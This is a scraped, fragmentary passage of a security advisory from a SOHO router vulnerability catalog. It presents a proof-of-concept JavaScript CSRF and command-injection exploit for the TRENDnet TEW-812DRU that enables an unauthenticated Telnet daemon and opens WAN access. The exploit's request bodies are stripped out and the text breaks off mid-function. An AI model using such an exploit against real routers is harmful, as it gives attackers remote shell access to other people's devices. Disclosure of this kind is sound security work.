ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
ISE SOHO Vulnerability Catalog Published - Independent Security ...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
♦ There currently is not a solution to this problem.<br />
Proof of Concept Exploit<br />
The following PoC JavaScript exploit will enable an unauthenticated Telnet daemon and<br />
add necessary firewall rules to enable WAN access to this service.<br />
<br />
<br />
TRENDnet TEW-‐812DRU CSRF -‐ Command Injection > Shell Exploit. <br />
<br />
<br />
<br />
<br />
Please wait... <br />
<br />
//Request to enable port forwarding to the routers internal IP on port 23 <br />
//This exploit works without this request, but the exploit was more stable with it, so its included in thos POC. <br />
function RF1(){ <br />
document.write(''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''); <br />
} <br />
//Request to enable telnet <br />
function RF2(){ <br />
document.write(''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
''+ <br />
<br />
19